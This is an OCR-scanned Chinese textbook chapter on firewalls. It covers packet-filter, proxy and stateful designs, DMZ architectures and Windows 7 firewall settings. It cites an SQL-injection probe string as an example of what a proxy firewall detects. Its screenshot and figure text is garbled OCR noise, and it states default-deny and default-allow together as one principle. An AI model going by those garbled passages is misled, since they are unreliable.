72 项 目 分 析 


网 络 的 发 展 虽 然 为 人 们 带 来 了 许多 方便 ,但 也 产生 了 很 多 安全 隐患 。 随 着 网 络 的 普及 ， 
病毒 .木马 .网 络 攻击 等 安全 事故 层出不穷 ,安装 一 款 好 的 防火 墙 软 件 必 不 可 少 。 

Windows 系统 自 带 了 防火 墙 ,能 满足 一 般 用 户 的 需要 。Windows 2000 Server、 
Windows Server 2003 和 Windows XP 的 Windows 防火 墙 只 能 控制 主动 人 侵 的 流量 ,对 于 
出 去 的 流量 不 做 拦截 。 这 样 如 果 计算 机 中 了 木马 , Windows 防火 墙 不 能 拦截 木马 程序 主动 
连接 出 去 的 流量 ,不 能 消除 安全 隐患 。 

Windows Sever 2008 和 Windows 7 中 的 高 级 安全 Windows 防火 墙 通过 入 站 和 出 站 规 
则 能 够 严格 控制 进出 计算 机 的 网 络 流量 ,进一步 提高 了 网 络 安全 性 。 
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73 相关 知识 点 


7.3.1 防火 墙 结构 概述 


以 前 当 构筑 和 使 用 木 结构 房屋 的 时 候 ,为 防止 火灾 的 发 生 和 蔓延 ,人 们 将 坚固 的 石 块 堆 
砌 在 房屋 周围 作为 屏障 ,这 种 防护 构筑 物 被 称 为 防火 墙 (firewall)。 如 今 , 人 们 借用 了 这 个 
概念 ,使 用 "防火墙 ?来 保护 敏感 的 数据 不 被 窃取 和 自 改 。 不 过 ,这 种 防火 墙 是 由 先进 的 计算 
机 系统 构成 的 。 防 火 墙 犹如 一 道 护栏 隔 在 被 保护 的 内 部 网 与 不 安全 的 非 信任 网 络 ( 外 部 网 ) 
之 间 , 用 来 保护 计算 机 网 络 免 受 非 授 权 人 员 的 骚扰 与 黑客 的 人 侵 。 

防火 墙 可 以 是 非常 简单 的 过 滤器 ,也 可 能 是 精心 配置 的 网 关 , 但 它们 的 原理 是 一 样 
的 ,都 用 于 监测 并 过 滤 所 有 内 部 网 和 外 部 网 之 间 的 信息 交换 。 防 火 墙 通常 是 运行 在 一 台 
单独 计算 机 之 上 的 一 个 特别 的 服务 软件 , 它 可 以 识别 并 屏蔽 非法 的 请 求 ,保护 内 部 网 络 
人 敏感 的 数据 不 被 偷窃 和 破坏 ,并 记录 内 外 网 通信 的 有 关 状 态 信息 ,如 通信 发 生 的 时 间 和 
进行 的 操作 等 。 

防火 墙 技术 是 一 种 有 效 的 网 络 安全 机 制 , 它 主要 用 于 确定 哪些 内 部 服务 允许 外 部 访问 ， 
以 及 允许 哪些 外 部 服务 访问 内 部 服务 。 其 基本 准则 就 是 : 一 切 未 被 允许 的 就 是 禁止 的 ;一 
切 未 被 禁止 的 就 是 允许 的 。 

防火 墙 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 ,并 越 来 
越 多 地 应 用 于 专用 网 络 (内 网 ) 与 公用 网 络 ( 外 网 ) 的 互联 环境 之 中 。 

防火 墙 应 该 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入口 ,能 根据 企业 的 安全 策略 
控制 (人 允许, 拒绝, 监测) 出 入网 络 的 信息 流 , 且 本 身 具 有 较 强 的 抗 攻 击 能 力 , 是 提供 信息 安全 
服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 在 逻辑 上 .防火墙 是 一 个 分 离 器 ,一 个 限制 器 ,也 是 
一 个 分 析 器 , 它 能 有 效 监控 内 部 网 和 外 部 网 之 间 的 任何 活动 ,保证 了 内 部 网 络 的 安全 。 其 结 


构 如 图 7-1 所 示 。 


远程 客户 端 






SQL 服 务 器 


防火 墙 








本 


Web 服 务 器 


图 7-1 防火 墙 示意 
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防火 墙 具 有 如 下 功能 。 

(1) 防火 墙 是 网 络 安全 的 屏障 。 由 于 只 有 经 过 精心 选择 的 应 用 协议 才能 通过 防火 墙 ， 
所 以 防火 墙 (作为 阻塞 点 、 控 制 点 ) 能 极 大 地 提高 内 部 网 络 的 安全 性 ,并 通过 过 滤 不 安全 的 服 
务 而 降低 风险 ,使 网 络 环境 变 得 更 安全 。 防 火 墙 同时 可 以 保护 网 络 免 受 基于 路 由 的 攻击 ,如 
IP 选项 中 的 源 路 由 攻击 和 ICMP 重 定向 中 的 重 定向 路 径 等 。 

(2) 防火 墙 可 以 强化 网 络 安全 策略 。 通 过 以 防火 墙 为 中 心 的 安全 方案 配置 ,能 将 所 有 
安全 软件 (如 口令 ,加密 、 身 份 认证 ,审计 等 ) 配 置 在 防火 墙 上 。 与 将 网 络 安全 问题 分 散 到 各 个 
主机 上 相 比 ,防火 墙 的 集中 安全 管理 更 经 济 。 例 如 在 网 络 访问 时 ,“ 一 次 一 密 ” 口 令 系 统 ( 即 每 
一 次 加 密 都 使 用 一 个 不 同 的 密 钥 ) 和 其 他 的 身份 认证 系统 完全 可 以 集中 于 防火 墙 一 身 。 

(3) 对 网 络 存 取 和 访问 进行 监控 审计 。 如 果 所 有 的 访问 都 经 过 防火 墙 , 那 么 ,防火 墙 就 
能 记录 下 这 些 访问 并 做 出 日 志 记 录 , 同 时 也 能 提供 网 络 使 用 情况 的 统计 数据 。 当 发 生 可 疑 
动作 时 ,防火 墙 能 进行 适当 的 报警 ,并 提供 网 络 是 否 受 到 探测 和 攻击 的 详细 信息 。 另 外 , 收 
集 一 个 网 络 的 使 用 和 误 用 情况 也 是 非常 重要 的 ,这 样 可 以 清楚 防火 墙 是 否 能 够 抵挡 攻击 者 
的 探测 和 攻击 ,清楚 防火 墙 的 控制 是 否 充分 。 而 网 络 使 用 统计 对 网 络 需 求 分 析 和 威胁 分 析 
等 而 言 也 是 非常 重要 的 。 

(4) 防止 内 部 信息 的 外 泄 。 通 过 利用 防火 墙 对 内 部 网 络 的 划分 ,可 实现 对 内 部 网 络 重 
点 网 段 的 隔离 ,从 而 限制 局 部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 再 者 ,隐私 
是 内 部 网 络 非常 关心 的 问题 ,一 个 内 部 网 络 中 不 引 人 注 意 的 细节 可 能 包含 了 有 关 安 全 的 线 
索 而 引起 外 部 攻击 者 的 兴趣 ,甚至 因此 而 暴露 了 内 部 网 络 的 某 些 安全 漏洞 。 使 用 防火 墙 就 
可 以 隐蔽 那些 透漏 内 部 细节 的 服务 ,例如 Finger( 用 来 查询 使 用 者 的 资料 ),DNS( 域 名 系统 ) 
等 服务 。Finger 显示 了 主机 的 所 有 用 户 的 注册 名 、 真 名 、 最 后 登录 时 间 和 使 用 shell 类 型 等 。 
但 是 Finger 显示 的 信息 非常 容易 被 攻击 者 所 获悉 。 攻 击 者 可 以 由 此 而 知道 一 个 系统 使 用 
的 频繁 程度 ,这 个 系统 是 否 有 用 户 正 在 连 线 上 网 ,这 个 系统 是 否 在 被 攻击 时 引起 注意 等 。 防 
火 墙 可 以 同样 阻塞 有 关内 部 网 络 中 的 DNS 信息 ,这 样 一 台 主 机 的 域名 和 IP 地 址 就 不 会 被 
外 界 所 了 解 。 除 了 安全 作用 以 外 ,防火 墙 通常 还 支持 VPN( 虚 拟 专用 网 络 ) 。 

虽然 防火 墙 能 够 在 很 大 程度 上 阻止 非法 入 侵 , 但 它 也 有 局 域 性 ,存在 着 一 些 防范 不 到 的 
地 方 ,比如 : 

(1) 防火 墙 不 能 防范 不 经 过 防火 墙 的 攻击 (例如 ,如 果 人 允许 从 受 保护 的 网 络 内 部 向 外 拨 
号 ,一 些 用 户 就 可 能 形成 与 因特网 的 直接 连接 ) 。 

(2) 目前 ,防火 墙 还 不 能 非常 有 效 地 防范 感染 了 病毒 的 软件 和 文件 的 传输 。 

(3) 防火 墙 管理 控制 的 是 内 部 网 络 与 外 部 网 络 之 间 的 数据 流 ,所 以 它 不 能 防范 来 自 内 
部 网 络 的 攻击 。 防 火 墙 是 用 来 防范 外 网 攻击 的 ,也 就 是 防范 黑客 攻击 的 。 内 部 网 络 攻击 有 
好 多 都 是 攻击 交换 机 或 者 攻击 网 络 内 部 其 他 计算 机 的 ,根本 不 经 过 防火 墙 ,所 以 防火 墙 就 失 
效 了 。 





7.3.2 防火 墙 技术 原理 


根据 防范 的 方式 和 侧重 点 的 不 同 ,防火 墙 技术 可 分 成 很 多 类 型 ,但 总 体 来 讲 可 分 为 三 大 
类 : 包 过 滤 技 术 ,应 用 代理 技术 和 状态 检测 技术 。 
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1. 包 过 滤 防 火 墙 

包 过 滤 防 火 墙 是 目前 使 用 最 为 广泛 的 防火 墙 , 它 工 作 在 网 络 层 和 传输 层 , 通 常安 装 在 路 
由 器 上 ,对 数据 包 进行 过 滤 选 择 。 通 过 检查 数据 流 中 每 一 数据 包 的 源 IP 地 址 .目的 IP 地 
址 .所 用 端口 号 ,协议 状态 等 参数 ,或 它们 的 组 合 与 用 户 预 定 的 访问 控制 表 中 的 规则 进行 比 
较 , 来 确定 是 否 人 允许 该 数据 包 通 过 。 如 果 检 查 数据 包 所 有 的 条 件 都 符合 规则 , 则 人 允许 通过 ; 
如 果 检 查 到 数据 包 的 条 件 不 符合 规则 , 则 阻止 通过 并 将 其 丢弃 。 数 据 包 检查 是 对 网 络 层 的 
首部 和 传输 层 的 首部 进行 过 滤 ,一般 要 检查 下 面 几 项 。 

(1) 源 IP 地址 。 

(2) 目的 IP 地 址 。 

(3) TCP/UDP 源 端 口 。 

(4) TCP/UDP 目的 端口 。 

(5) 协议 类 型 (TCP 包 ,UDP 包 ICMP 包 )。 

(6) TCP 报头 中 的 ACK 位 。 

(7) ICMP 消息 类 型 。 

实际 上 , 包 过 滤 防 火 墙 一 般 允 许 网 络 内 部 的 主机 直接 访问 外 部 网 络 , 而 外 部 网 络 上 的 主 
机 对 内 部 网 络 的 访问 则 要 受到 限制 。 

Internet 上 的 某 些 特定 服务 一 般 都 使 用 相对 固定 的 端口 号 ,因此 路 由 器 在 设置 包 过 滤 
规则 时 指定 ,对 于 某 些 端口 号 允许 数据 包 与 该 端口 交换 ,或 者 阻 断 数据 包 与 它们 的 连接 。 

包 过 滤 规 则 定义 在 转发 控制 表 中 ,数据 包 遵循 自 上 而 下 的 次 序 依次 运用 每 一 条 规则 , 直 
到 遇 到 与 其 相 匹 配 的 规则 为 止 。 对 数据 包 可 采取 的 操作 有 转发 .丢弃 、 报 错 等 。 根 据 不同 的 
实现 方式 , 包 过 滤 可 以 在 进入 防火 墙 时 进行 ,也 可 以 在 离开 防火 墙 时 进行 。 

表 7-1 是 常见 的 包 过 滤 转 发 控制 表 。 

表 7-1 包 过 滤 转发 控制 表 




















规则 序号 | 传输 方向 | 协议 类 型 | 源 地 址 | 源 端 口号 | 目的 地 址 | 目的 端口 号 | 控制 操作 
1 in TCP 外 部 >1023 内 部 80 allow 
2 out TCP 内 部 80 外 部 >1023 allow 
3 out TCP 内 部 >1023 外 部 80 allow 
4 in TCP 外 部 80 内 部 >1023 allow 
5 both x x x x x deny 


























注 : 表 中 的 * 表示 任意 。 


表 7-1 中 的 规则 1、 规则 2 允许 外 部 主机 访问 本 站 点 的 WWW 服务 器 ,规则 3、 规 则 4 允 
许 内 部 主机 访问 外 部 的 WWW 服务 器 。 巾 于 服务 器 可 能 使 用 非 标准 端口 号 ,给 防火 墙 允 许 
的 配置 带 来 一 些 麻烦 。 实 际 使 用 的 防火 墙 都 直接 对 应 用 协议 进行 过 滤 , 即 管理 员 可 在 规则 
中 指明 是 否 允许 HTTP 通过 ,而 不 是 只 关注 80 端口 。 

规则 5 表示 除了 规则 1 一 规则 4 允许 的 数据 包 通 过 外 ,其 他 所 有 数据 包 一 律 禁 止 通 过 ， 
即 一 切 未 被 允许 的 就 是 禁止 的 。 

包 过 滤 防 火 墙 的 优点 是 简单 方便、 速度 快 .对 用 户 透明 ,对 网 络 性 能 影响 不 大 。 其 缺点 
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是 : 不 能 彻底 防止 IP 地 址 欺骗 ;一 些 应 用 协议 不 适合 于 数据 包 过 滤 ; 缺 乏 用 户 认证 机 制 ; 正 
常 的 数据 包 过 滤 路 由 器 无 法 执行 某 些 安全 策略 。 因 此 , 包 过 滤 防 火 墙 的 安全 性 较 差 。 

2. 代理 防火 墙 

首先 介绍 一 下 代理 服务 器 ,代理 服务 器 作为 一 个 为 用 户 保密 或 者 突破 访问 限制 的 数据 
转发 通道 ,在 网 络 上 应 用 广泛 。 一 个 完整 的 代理 设备 包含 一 个 代理 服务 器 端 和 一 个 代理 客 
户 端 ,代理 服务 器 端 接收 来 自用 户 的 请 求 , 调 用 自身 的 代理 客户 端 模 拟 一 个 基于 用 户 请 求 的 
连接 到 目的 服务 器 ,再 把 目的 服务 器 返回 的 数据 转发 给 用 户 ,完成 一 次 代理 工作 过 程 。 其 工 
作 过 程 如 图 7-2 所 示 。 





代理 截获 客户 机 和 服务 器 之 
间 的 通信 ， 有 全 部 的 控制 权 











服务 器 



































代理 服务 器 (防火 墙 ) 
图 7-2 代理 防火 墙 的 工作 过 程 


也 就 是 说 ,代理 服务 器 通常 运行 在 两 个 网 络 之 间 ,是 客户 机 和 真实 服务 器 之 间 的 中 介 ， 
代理 服务 器 彻底 隔断 内 部 网 络 与 外 部 网 络 的 “直接 ?通信 ,内 部 网 络 的 客户 机 对 外 部 网 络 的 
服务 器 的 访问 , 变 成 了 代理 服务 器 对 外 部 网 络 的 服务 器 的 访问 .然后 由 代理 服务 器 转发 给 内 
部 网 络 的 客户 机 。 代 理 服务 器 对 内 部 网 络 的 客户 机 来 说 像 是 一 台 服 务 器 ,而 对 于 外 部 网 络 
的 服务 器 来 说 ,又 像 是 一 台 客 户 机 。 

如 果 在 一 台 代 理 设备 的 代理 服务 器 端 和 代理 客户 端 之 间 连 接 一 个 过 滤 措 施 ,就 成 了 “应 
用 代理 ”防火 墙 ,这 种 防火 墙 实 际 上 就 是 一 台 小 型 的 带 有 数据 "检测 、 过 滤 ” 功 能 的 透明 代理 
服务 器 ,但 是 并 不 是 单纯 地 在 一 个 代理 设备 中 嵌入 包 过 滤 技 术 , 而 是 一 种 被 称 为 “应 用 协议 
分 析 ”(application protocol analysis) 的 技术 。 所 以 也 经 常 把 代理 防火 墙 称 为 代理 服务 器 、 
应 用 网 关 , 工 作 在 应 用 层 ,适用 于 某 些 特定 的 服务 ,如 HTTP、FTP 等 。 其 工作 原理 如 图 7-3 
所 示 。 

“应 用 协议 分 析 ” 技 术 工 作 在 OSI 模型 的 应 用 层 上 ,在 这 一 层 能 接触 到 的 所 有 数据 都 是 
最 终 形式 ,也 就 是 说 ,防火 墙 “看 到 ”的 数据 与 最 终 用 户 看 到 的 是 一 样 的 ,而 不 是 一 个 个 带 着 
地 址 .端口 ,协议 等 原始 内 容 的 数据 包 , 因 而 可 以 实现 更 高 级 的 数据 检测 过 程 。 

“应 用 协议 分 析 ” 模 块 便 根据 应 用 层 协 议 处 理 这 个 数据 ,通过 预 置 的 处 理 规则 查询 这 个 
数据 是 否 带 有 危害。 由 于 这 一 层面 对 的 已 经 不 再 是 组 合 有 限 的 报 文 协议 ,可 以 识别 HTTP 
头 中 的 内 容 , 如 进行 域名 的 过 滤 , 甚 至 可 识别 类 似 于 “GET/sql. asp? id 一 1 and 1” 的 数据 内 
容 , 所 以 防火 墙 不 仅 能 根据 数据 应 用 层 提供 的 信息 判断 数据 ,更 能 像 管 理 员 分 析 服 务 器 日 志 
那样 “看 ”内 容 辨别 危害 。 
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图 7-3 代理 防火 墙 的 工作 原理 


代理 防火 墙 实际 上 就 是 一 台 小 型 的 带 有 数据 “检测 ,过滤 ?功能 的 透明 "代理 服务 器 ", 有 
时 人 们 把 代理 防火 墙 也 称 为 代理 服务 器 ,代理 服务 器 工作 在 应 用 层 , 针 对 不 同 的 应 用 协议 ， 
需要 建立 不 同 的 服务 代理 ,如 HTTP 代理 .FTP 代理 `. POP3 代理 、Telnet 代理 、SSL 代理 、 
Socks 代理 等 。 

代理 防火 墙 的 特点 是 完全 “阻隔 ”了 网 络 通信 流 , 通 过 对 每 种 应 用 服务 编制 专门 的 代理 
程序 ,实现 监视 和 控制 应 用 层 通信 流 的 作用 。 与 包 过 滤 防 火 墙 不 同 之 处 在 于 ,内 部 网 和 外 部 
网 之 间 不 存在 直接 连接 ,同时 提供 审计 和 日 志 服 务 。 实 际 中 的 代理 防火 墙 通常 由 专用 工作 


站 来 实现 ,如 图 7-4 所 示 。 
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图 7-4 代理 防火 墙 


内 部 主机 


代理 防火 墙 是 内 部 网 与 外 部 网 的 隔离 点 ,工作 在 OSI 模型 的 最 高 层 , 掌 握 着 应 用 系统 
中 可 用 作 安 全 决策 的 全 部 信息 ,起 着 监视 和 隔绝 应 用 层 通信 流 的 作用 。 其 优点 是 可 以 检查 
应 用 层 、 传 输 层 和 网 络 层 的 协议 特征 ,对 数据 包 的 检测 能 力 比较 强 。 其 缺点 主要 是 难于 配置 
和 处 理 速度 较 慢 。 
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3. 状态 检测 防火 墙 

状态 检测 技术 是 基于 会 话 层 的 技术 ,对 外 部 的 连接 和 通信 行为 进行 状态 检测 ,阻止 具有 
攻击 性 可 能 的 行为 ,从 而 可 以 抵御 网 络 攻击 。 

Internet 上 传输 的 数据 都 必须 遵循 TCP/IP 协议 。 根 据 TCP 协议 ,每 个 可 靠 连接 的 建 
立 需 要 经 过 “客户 端 同 步 请 求 “ 服 务 器 应 答 ”“ 客 户 端 再 应 答 ”3 个 阶段 ( 即 三 次 握手 ) ,如常 
用 的 Web 浏览 文件 下 载 和 收发 邮件 等 都 要 经 过 这 3 个 阶段 ,这 反映 出 数据 包 并 不 是 独立 
的 ,而 是 前 后 之 间 有 着 密切 的 状态 联系 .基于 这 种 状态 变化 ,引出 了 状态 检测 技术 。 

状态 检测 防火 墙 气 弃 了 包 过 滤 防 火 墙 仅 检 查 数据 包 的 IP 地 址 等 几 个 参数 ,而 不 关心 数 
据 包 连接 状态 变化 的 缺点 ,在 防火 墙 的 核心 部 分 建立 状态 连接 表 , 并 将 进出 网 络 的 数据 当成 
一 个 个 的 会 话 , 利 用 状态 连接 表 跟 踪 每 一 个 会 话 状态 。 状 态 检测 对 每 一 个 数据 包 的 检查 不 
仅 根据 规则 表 , 还 考虑 了 数据 包 是 否 符合 会 话 所 处 的 状态 ,因此 提供 了 完整 的 对 传输 层 的 控 
制 能 力 。 

状态 检测 技术 采用 了 一 系列 优化 技术 ,使 防火 墙 性 能 大 幅度 提升 ,能 应 用 在 各 类 网 络 环 
境 中 ,尤其 是 在 一 些 规则 复杂 的 大 型 网 络 上 。 任 何 一 款 高 性 能 的 防火 墙 ,都 会 采用 状态 检测 
技术 。 国 内 著名 的 防火 墙 公司 ,如 北京 天 融 信 等 公司 ,2000 年 就 开始 采用 状态 检测 技术 ,并 
在 此 基础 上 创新 推出 了 核 检测 技术 ,在 实现 安全 目标 的 同时 可 以 得 到 极 高 的 性 能 。 


7.3.3 ”防火 增 体系 结构 


网 络 防火 墙 的 安全 体系 结构 基本 上 可 分 为 4 种 : 包 过 滤 路 由 器 防火 墙 结 构 ; 双 宿主 主 
机 防火 墙 结构 ;屏蔽 主机 防火 墙 结构 ;屏蔽 子 网 防火 墙 结构 。 

1. 包 过 滤 路 由 器 防火 墙 结构 

在 传统 的 路 由 器 中 增加 包 过 滤 功 能 就 能 形成 这 种 简单 的 防火 墙 。 这 种 防火 墙 的 好 处 是 
完全 透明 ,但 由 于 是 在 单机 上 实现 ,形成 了 网 络 中 的 “ 单 失效 点 ”"。 由 于 路 由 器 的 基础 功能 是 
转发 数据 包 , 一 旦 过 滤 机 能 失效 ,被 入 侵 就 会 形成 网 络 直通 状态 ,任何 非法 访问 都 可 以 进入 
内 部 网 络 。 这 种 防火 墙 尚 不 能 提供 有 效 的 安全 功能 , 仅 在 早期 的 网 络 中 应 用 。 包 过 滤 路 由 


器 防火 墙 的 基本 结构 如 图 7-5 所 示 。 
Re 


包 过 滤 路 由 器 





内 部 网 络 








图 7-5 包 过 滤 路 由 器 防火 墙 结构 


2. 双 宿 主 主机 防火 墙 结构 
该 结构 至 少 由 具有 两 个 接口 ( 即 两 块 网 卡 ) 的 双 宿 主 主机 (堡垒 主机 ) 而 构成 。 双 宿主 主 
机 的 一 个 接口 接 内 部 网 络 , 另 一 个 接口 接 外 部 网 络 。 内 、 外 网 络 之 间 不 能 直接 通信 ,必须 通 
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过 双 宿 主 主机 上 的 应 用 层 代理 服务 来 完成 ,其 结构 如 图 7-6 所 示 。 如 果 一 旦 黑客 侵入 堡 合 
主机 并 使 其 具有 路 由 功能 ,那么 防火 墙 将 变 得 无 用 。 





内 部 网 络 


"i 四， 








服务 器 ES J 


图 7-6 双 宿 主 主机 防火 墙 结构 


该 结构 的 优点 是 网 络 结构 简单 ,有 较 好 的 安全 性 ,可 以 实现 身份 鉴别 和 应 用 层 数据 过 
滤 。 但 当 外 部 用 户 和 人 侵 堡垒 主机 时 ,可 能 导致 内 部 网 络 处 于 不 安全 的 状态 。 

3. 屏蔽 主机 防火 墙 结构 

该 结构 的 防火 墙 由 包 过 滤 路 由 器 和 运行 网 关 软 件 的 堡垒 主机 构成 。 该 结构 提供 安全 保 
护 的 堡 估 主机 仅 与 内 部 网 络 相连 ,而 包 过 滤 路 由 器 位 于 内 部 网 络 和 外 部 网 络 之 间 , 如 图 7-7 


所 示 。 


内 部 网 络 











1 
1 
1 
1 
和 
1 
1 
1 
1 


ES 和 


图 7-7 屏蔽 主机 防火 墙 结构 


通常 在 路 由 器 上 设立 过 滤 规 则 ,使 得 堡垒 主机 成 为 从 外 部 网 络 唯一 可 直接 到 达 的 主机 ， 
这 确保 了 内 部 网 络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 屏 项 主机 防火 墙 实现 了 网 络 层 和 应 用 
层 的 安全 ,因而 比 单纯 的 包 过 滤 防 火 墙 更 安全 。 在 这 一 方式 下 , 包 过 滤 路 由 器 是 否 配置 正 
确 ,是 这 种 防火 墙 安全 与 否 的 关键 。 如 果 路 由 表 遭 到 破坏 ,堡垒 主机 就 可 能 被 越过 ,使 内 部 
网 络 完全 暴露 。 

4. 屏蔽 子 网 防火 墙 结构 

该 防火 墙 结构 如 图 7-8 所 示 , 采 用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,在 内 外 网 络 之 
间 建 立 了 一 个 被 隔离 的 子 网 ,通常 称 为 非 军事 区 (DMZ 区 )。 可 以 将 各 种 服务 器 (如 WWW 
服务 器 .FTP 服务 器 等 ) 置 于 DMZ 区 中 ,解决 了 服务 器 位 于 内 部 网 络 带 来 的 不 安全 问题 。 

由 于 采用 两 个 路 由 器 进行 了 双重 保护 ,外 部 攻击 数据 很 难 进入 内 部 网 络 。 外 网 用 户 通 


过 DMZ 





区 中 的 服务 器 访问 企业 的 网 站 ,而 不 需要 进入 内 网 。 在 这 一 配置 中 ,即使 堡垒 主机 


被 人 侵 者 控制 ,内 部 网 络 仍然 受到 内 部 包 过 滤 路 由 器 的 保护 ,避免 了 * 单 点 失效 "的 问题 。 
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| 四 加 | 
! WWW 服 务 器 | 
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“BB 国 一 -四 一 下 
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包 过 滤 路 由 器 | 1 ， 包 过 滤 路 由 器 
| 1 


图 7-8 屏蔽 子 网 防火 墙 结构 


上 述 几 种 防火 墙 结构 是 允许 调整 和 改动 的 ,如 合并 内 外 路 由 器 、 合 并 堡垒 主机 和 外 部 路 
由 器 、 合 并 堡垒 主机 和 内 部 路 由 器 等 ,由 防火 墙 承担 合并 部 分 的 合并 前 的 功能 。 


7.3.4 Windows 防火 墙 


Windows 7 系统 内 置 了 Windows 防火 墙 , 它 可 以 为 计算 机 提供 保护 ,以 避免 其 遭受 外 
部 恶意 软件 的 攻击 。 

1. 网 络 位 置 

在 Windows 7 系统 中 ,不 同 的 网 络 位 置 可 以 有 不 同 的 Windows 防火 墙 设置 ,因此 为 了 
增加 计算 机 在 网 络 中 的 安全 ,管理 员 应 该 将 计算 机 设置 在 适当 的 网 络 位 置 。 可 以 选择 的 网 
络 位 置 主要 包括 专用 网 络 、 公 用 网 络 、 域 网 络 共 3 种 ,如 图 7-9 所 示 。 














贮 控制 压板 ， 所 有 控制 回 概 项 Windows 防火 培 | 条 趾 EPE 呈 
sb w -> em 
9 
ri 使 用 Windows 防火 墙 来 帮助 保护 您 的 计算 机 


区 许 程 训 或 功能 通过 Windows 。。 Windows 防火 壤 有 功 于 防止 黑帮 或 末 软 件 通过 Internet 或 网 络 访问 您 的 计算 机 
































防火 二 知 何 和 助 保 护 计算 机 7 
什么 是 网 阁 位 置 7 
二 图 久 I 人 f(s(0) EE 
国 ia 和 首 目 信 手 的 用 户 和 设备 所 在 的 家 许 或 工作 网 络 
对 网 络 则 行星 从 解答 
Windows 防火 培 状 态 : 启用 
传 入 注 接 ， 阻止 所 与 未 在 多 许 程 字 列 表 直 的 程序 的 连接 
活动 的 家 庭 或 工作 专用) 网络: 偷 Ap 
过 XIK 坟 : Windows 防火 半 阴 由 新 程 序 时 天 知 和 
加 名 人 ms ES 
公共 肠 所 (人 如 机 场 坏 嘎 啡 让) 中 的 网 络 
Windows 防火 培 状 态 : 启用 
传 入 连接 : 胃 目 所 有 与 未 在 允许 程 床 列 表 让 的 程序 的 连接 
活动 的 公用 网 络 : 无 
号 请 参 到 通知 伏 态 : Windows 防火 污 阻 止 新 程序 时 通知 我 
扣 作 中 心 
网 络 和 共享 中 心 





图 7-9 Windows 防火 墙 
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1) 专用 网 络 

专用 网 络 包含 家 庭 网 络 和 工作 网 络 。 在 该 网 络 位 置 中 ,系统 会 启用 网 络 搜索 功能 使 用 
户 在 本 地 计算 机 上 可 以 找到 网 络 上 的 其 他 计算 机 ;同时 也 会 通过 设置 Windows 防火 墙 ( 开 
放 传 人 的 网 络 搜索 流量 ) 使 网 络 内 其 他 用 户 能 够 浏览 到 本 地 计算 机 。 

2) 公用 网 络 

公用 网 络 主要 指 外 部 不 安全 的 网 络 ( 如 机 场 、. 咖 啡 店 的 网 络 ) 。 在 该 网 络 位 置 中 ,系统 会 
通过 Windows 防火 墙 的 保护 ,使 其 他 用 户 无 法 在 网 络 上 浏览 到 本 地 计算 机 ,并 可 以 阻止 来 
自 Internet 的 攻击 行为 ;同时 也 会 禁用 网 络 搜索 功能 ,使 用 户 在 本 地 计算 机 上 也 无 法 找到 网 
络 上 的 其 他 计算 机 。 

3) 域 网 络 

如 果 计 算 机 加 入 域 , 则 其 网 络 位 置 会 自动 被 设置 为 域 网 络 ,并 且 无 法 自行 更 改 。 

更 改 计算 机 的 网 络 位 置 “公用 ?或 “专用 ”, 其 实 是 应 用 了 Windows 防火 墙 的 不 同 配置 
文件 。 

2. 高 级 安全 性 

具有 高 级 安全 性 的 Windows 防火 墙 结合 了 主机 防火 墙 和 IPSec 技术 (一 种 用 来 通过 公 
共 IP 网 络 进行 安全 通信 的 技术 )。 与 边界 防火 墙 不 同 , 具 有 高 级 安全 性 的 Windows 防火 墙 
可 在 每 台 运 行 Windows 7/ Windows Server 2008 的 计算 机 上 运行 ,并 对 可 能 穿越 外 围 网 络 
或 源 于 组 织 内 部 的 网 络 攻击 提供 本 地 保护 。 它 还 提供 计算 机 到 计算 机 的 连接 安全 ,使 用 户 
对 通信 过 程 要 求 身份 验证 和 数据 保护 。 

具有 高 级 安全 性 的 Windows 防火 墙 是 一 种 状态 防火 墙 , 它 检查 并 筛选 IPv4 和 IPv6 流 
量 的 所 有 数据 包 。 它 默认 阻止 传人 流量 ,除非 是 对 主机 请 求 ( 请 求 的 流量 ) 的 响应 ,或 者 被 特 
别 允 许 ( 即 创建 了 防火 墙 规则 允许 该 流量 ) ,默认 允许 传 出 流量 。 通 过 配置 具有 高 级 安全 性 
的 Windows 防火 墙 设置 (指定 端口 号 .应 用 程序 名 称 、 服 务 名 称 或 其 他 标准 ) ,可 以 显 式 允 许 
流量 。 

使 用 具有 高 级 安全 性 的 Windows 防火 墙 还 可 以 请 求 或 要 求 计算 机 在 通信 之 前 互相 进 
行 身份 验证 ,并 在 通信 时 使 用 数据 完整 性 检查 或 数据 加 密 。 

具有 高 级 安全 性 的 Windows 防火 墙 使 用 两 组 规则 配置 其 如 何 响应 传人 和 传 出 流量 , 即 
防火 墙 规则 (入 站 规则 和 出 站 规则 ) 和 连接 安全 规则 ,如 图 7-10 所 示 。 其 中 防火 墙 规则 确定 
允许 或 阻止 哪 种 流量 ,连接 安全 规则 确定 如 何 保护 此 计算 机 和 其 他 计算 机 之 间 的 流量 。 通 
过 使 用 防火 墙 配置 文件 (根据 计算 机 连接 的 网 络 位 置 ) ,可 以 应 用 这 些 规则 及 其 他 设置 ,还 可 
以 监视 防火 墙 活动 和 规则 。 

1) 防火 墙 规则 

配置 防火 墙 规则 以 确定 阻止 还 是 允许 网 络 流量 通过 具有 高 级 安全 性 的 Windows 防火 
墙 。 传 人 数据 包 到 达 计 算 机 时 ,具有 高 级 安全 性 的 Windows 防火 墙 检 查 该 数据 包 ,并 确定 
它 是 否 符合 防火 墙 规则 中 指定 的 标准 。 如 果 数 据 包 与 规则 中 的 标准 匹配 , 则 具有 高 级 安全 
性 的 Windows 防火 墙 执行 规则 中 指定 的 操作 , 即 阻止 连接 或 者 允许 连接 。 如 果 数 据 包 与 规 
则 中 的 标准 不 匹配 , 则 具有 高 级 安全 性 的 Windows 防火 墙 丢 弃 该 数据 包 , 并 在 防火 墙 日 志 
文件 中 创建 相关 条 目 ( 如 果 启 用 了 日 志 记 录 )。 

对 规则 进行 配置 时 ,可 以 从 各 种 标准 中 进行 选择 ,如 应 用 程序 名 称 、 系 统 服 务 名 称 、TCP 
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办 高 并 胡 全 Widows 防火 增 为 Wincons 计算 机 扒 抽 安全 。 
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图 7-10 高 级 安全 Windows 防火 墙 


端口 .UDP 端口 ,本 地 IP 地 址 .远程 IP 地 址 、 配 置 文件 ,接口 类 型 (如 网 络 适配器 )、 用 户 、 用 
